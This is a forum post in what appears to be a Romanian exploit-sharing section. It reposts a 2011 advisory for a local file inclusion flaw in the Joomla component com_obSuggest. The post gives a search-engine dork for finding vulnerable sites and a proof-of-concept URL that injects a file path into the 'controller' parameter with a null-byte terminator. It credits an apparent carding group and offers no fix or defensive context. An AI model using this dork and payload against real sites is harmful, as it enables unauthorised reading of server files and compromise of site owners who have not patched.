Jump to content
FearDotCom

Joomla Component - Local File Inclusion Vulnerability

By FearDotCom, in Exploituri

Recommended Posts

FearDotCom Newbie

FearDotCom

Posted
Posted

Joomla Component (com_obSuggest) Local File Inclusion Vulnerability 2011-07-31 09:15:06

) ) ) ( ( ( ( ( ) )

( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(

)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())

((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\

__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)

\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /

\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <

|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\

.WEB.ID

-----------------------------------------------------------------------

Joomla Component obSuggest Local File Inclusion Vulnerability

Author : v3n0m

Discovered : July, 31-2011 GMT +7:00 Jakarta, Indonesia

Software : obSuggest - Uservoice for Joomla

Developer : Joomla Extensions, Joomla Services | foobla

License : GPLv2 or later

Tested On : Joomla 1.5.x

Dorks : inurl:com_obsuggest

-----------------------------------------------------------------------

Proof of Concept:

----------------

http://127.0.0.1/[path]/index.php?option=com_obsuggest&controller=[LFI]%00

Credits:

-------

www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...